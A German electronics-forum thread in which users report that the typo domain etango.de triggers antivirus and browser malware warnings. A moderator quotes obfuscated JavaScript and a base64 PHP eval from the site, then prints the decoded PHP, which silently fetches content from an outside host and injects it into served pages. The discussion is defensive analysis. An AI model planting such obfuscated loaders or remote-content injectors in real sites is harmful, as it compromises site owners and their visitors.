mikrocontroller.net

Forum: PC Hard- und Software WARNUNG VOR ETANGO.DE


Autor: GAST (Gast)
Datum:

Bewertung
0 lesenswert
nicht lesenswert
Achtung: Wer statt der plattform etengo.de  etango tipp, kriegt einen 
Virus instaliert!

mein virenscanner hat es zufällig gemerkt!

: Verschoben durch Moderator
Autor: John Michael Dorian (Gast)
Datum:

Bewertung
0 lesenswert
nicht lesenswert
troll?

Autor: GAST (Gast)
Datum:

Bewertung
0 lesenswert
nicht lesenswert
Nein: Der Avast Virenscanner findet 3 Dateien, die sich beim Aufruf der 
Seite temporär platzieren und als trojanische Pferde erkannnt werden.

Der meldet sehr selten einen alert, bin richtig erschrocken.

Autor: David ... (volatile)
Datum:

Bewertung
0 lesenswert
nicht lesenswert
Interessant. AntiVir spricht auch an, nach einigen Sekunden schmiert 
dann Iron ab.

Autor: Alf (Gast)
Datum:

Bewertung
0 lesenswert
nicht lesenswert
Das sagt mein Firefox:

Als attackierend gemeldete Website!



Die Website auf etango.de wurde als attackierende Seite gemeldet und auf 
Grund Ihrer Sicherheitseinstellungen blockiert.



Attackierende Websites versuchen, Programme zu installieren, die private 
Informationen stehlen, Ihren Computer verwenden, um andere zu 
attackieren oder Ihr System beschädigen.

Manche Websites vertreiben bewusst Viren und ähnlich schädliche 
Software, aber viele Websites sind auch ohne das Wissen oder die 
Erlaubnis des Betreibers kompromittiert.




Ich verstehe nur, nicht, wer das jetzt erkannt hat, mein Firefox?

Autor: Gibts Ne (schneeblau)
Datum:

Bewertung
0 lesenswert
nicht lesenswert
mein FF sagt nix...

Autor: Ch D. (chrisu) Benutzerseite
Datum:

Bewertung
0 lesenswert
nicht lesenswert
Also Google Chrome warnt mich auch!!!!!!!!!! Um was wetten wir das wenn 
man IE hat der einen nicht warnt!

Autor: Gast (Gast)
Datum:

Bewertung
0 lesenswert
nicht lesenswert
Google Chrome warnt dich sicher auch, wenn du zu wenig Daten pro Monat 
an Google sendest...

Autor: Alf (Gast)
Datum:

Bewertung
0 lesenswert
nicht lesenswert
> Ich verstehe nur, nicht, wer das jetzt erkannt hat, mein Firefox?

Ich habe es gefunden: Es ist mein Firefox, man kann es unter 
"Extras-Einstellungen-Sicherheit" anklicken. Das war bei mir 
standardmaessig angeklickt.

Autor: GAST (Gast)
Datum:

Bewertung
0 lesenswert
nicht lesenswert
Kann man eigentlich solche Seiten sperren lassen???

Autor: Alf (Gast)
Datum:

Bewertung
0 lesenswert
nicht lesenswert
Frag doch mal die Frau von der Leihen.

Autor: Mark Brandis (markbrandis)
Datum:

Bewertung
0 lesenswert
nicht lesenswert
Was wollt Ihr auch mit elektrischem Tango? ;-)

Autor: omg (Gast)
Datum:

Bewertung
0 lesenswert
nicht lesenswert
so eine scheisse überflüssiger thread hier! grrrrr!

Autor: Jörg Wunsch (dl8dtl) (Moderator) Benutzerseite
Datum:

Bewertung
0 lesenswert
nicht lesenswert
Lustiges Zeug machen die da:
        <body bgcolor="#bdcaf6"><script>function c246dea728q4ac58d66bf6df(q4ac58d66bfeac){
function q4ac58d66c067a(){var q4ac58d66c0e4a=16;return q4ac58d66c0e4a;}
return (eval('pa'+'rseInt')
(q4ac58d66bfeac,q4ac58d66c067a()));}
function q4ac58d66c161a(q4ac58d66c1de9){ var q4ac58d66c3557=2;
var q4ac58d66c25b8='';q4ac58d66c44f7=String['fromCharCode'];
for(q4ac58d66c2d88=0;q4ac58d66c2d88<q4ac58d66c1de9.length;
q4ac58d66c2d88+=q4ac58d66c3557){ q4ac58d66c25b8+=(q4ac58d66c44f7(c246dea728q4ac58d66bf6df
(q4ac58d66c1de9.substr(q4ac58d66c2d88,q4ac58d66c3557))));}return 

usw. usf.

<?eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGxpbmtzID0gbmV3IEd
ldExpbmtzKCk7DQoNCmVjaG8gJGxpbmtzLT5MaW5rczsNCmNsYXNzIEdldExpbmtzDQp7D
QoJdmFyICRob3N0ID0gImVzbGkudHciOw0KCXZhciAkcGF0aCA9ICIvbG

...

(Im Original alles auf 19 Zeilen gequetscht, 14 KiB.)

Autor: Mike J. (Gast)
Datum:

Bewertung
0 lesenswert
nicht lesenswert
Die haben einfach die Variablennamen durch ein zufällige 
buchstaben+nummern ersetzt...billig unkenntlich gemacht.

Autor: Jens G. (jensig)
Datum:

Bewertung
0 lesenswert
nicht lesenswert
das sind wohl eher Hex-Nummern, denen ein q vorangestellt wurde

Autor: Thomas B. (detritus)
Datum:

Bewertung
0 lesenswert
nicht lesenswert
Wird man wohl durch nen Obfuscator gejagt haben, zum Schutz geistigen 
Eigentums ;)

Autor: Jörg Wunsch (dl8dtl) (Moderator) Benutzerseite
Datum:

Bewertung
0 lesenswert
nicht lesenswert
Habe mal den ersten base64-Block durch den Dekoder geschoben:
error_reporting(0);
$links = new GetLinks();

echo $links->Links;
class GetLinks
{
        var $host = "esli.tw";
        var $path = "/link.php?site=";
        var $site = "";
        var $user_agent = "";

        var $Links = "";


        var $_socket_timeout    = 12;
        var $_cashe_life_time    = 3600;
        var $_cashe_file                            = "cashe.txt";

        function GetLinks()
        {
                if (!is_file($this->_cashe_file) || (filemtime($this->_cashe_file) < (time()-$this->_cashe_life_time)) || filesize($this->_cashe_file) == 0) {

                        $this->site                             = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $HTTP_SERVER_VARS['HTTP_HOST'];
                        $this->user_agent = $_SERVER['HTTP_USER_AGENT'];

                        $this->Links                    = $this->fetch_remote_file();
                        if ($handle = fopen($this->_cashe_file, 'w')) {
                                fwrite($handle, $this->Links);
                        }

                        fclose($handle);
                }
                else {
                        $this->Links = file_get_contents($this->_cashe_file);
                }
        }

        function fetch_remote_file()
        {
          $buff = '';
    $fp = fsockopen($this->host, 80, $errno, $errstr, $this->_socket_timeout);
    if (!$fp) {

    } else {
        $out = "GET {$this->path}{$this->site} HTTP/1.1\r\n";
        $out .= "Host: {$this->host}\r\n";
        $out .= "Connection: Close\r\n\r\n";
    
        fwrite($fp, $out);
        while (!feof($fp)) {
            $buff .= fgets($fp, 128);
        }
        fclose($fp);
                        $page = explode("\r\n\r\n", $buff);
                        return $page[1];
    }
        }
}

Autor: Jörg Wunsch (dl8dtl) (Moderator) Benutzerseite
Datum:

Bewertung
0 lesenswert
nicht lesenswert
domreg -at- de.mail.internet-medien.com ist der für die Domain
zuständige technical contact.  Vielleicht sollte dem ja mal jemand
eine Nachricht zukommen lassen...

Antwort schreiben

Die Angabe einer E-Mail-Adresse ist freiwillig. Wenn Sie automatisch per E-Mail über Antworten auf Ihren Beitrag informiert werden möchten, melden Sie sich bitte an.

Wichtige Regeln - erst lesen, dann posten!

  • Groß- und Kleinschreibung verwenden
  • Längeren Sourcecode nicht im Text einfügen, sondern als Dateianhang

Formatierung (mehr Informationen...)

  • [c]C-Code[/c]
  • [avrasm]AVR-Assembler-Code[/avrasm]
  • [code]Code in anderen Sprachen, ASCII-Zeichnungen[/code]
  • [math]Formel in LaTeX-Syntax[/math]
  • [[Titel]] - Link zu Artikel
  • Verweis auf anderen Beitrag einfügen: Rechtsklick auf Beitragstitel,
    "Adresse kopieren", und in den Text einfügen




Bild automatisch verkleinern, falls nötig
Bitte das JPG-Format nur für Fotos und Scans verwenden!
Zeichnungen und Screenshots im PNG- oder
GIF-Format hochladen. Siehe Bildformate.
Hinweis: der ursprüngliche Beitrag ist mehr als 6 Monate alt.
Bitte hier nur auf die ursprüngliche Frage antworten,
für neue Fragen einen neuen Beitrag erstellen.

Mit dem Abschicken bestätigst du, die Nutzungsbedingungen anzuerkennen.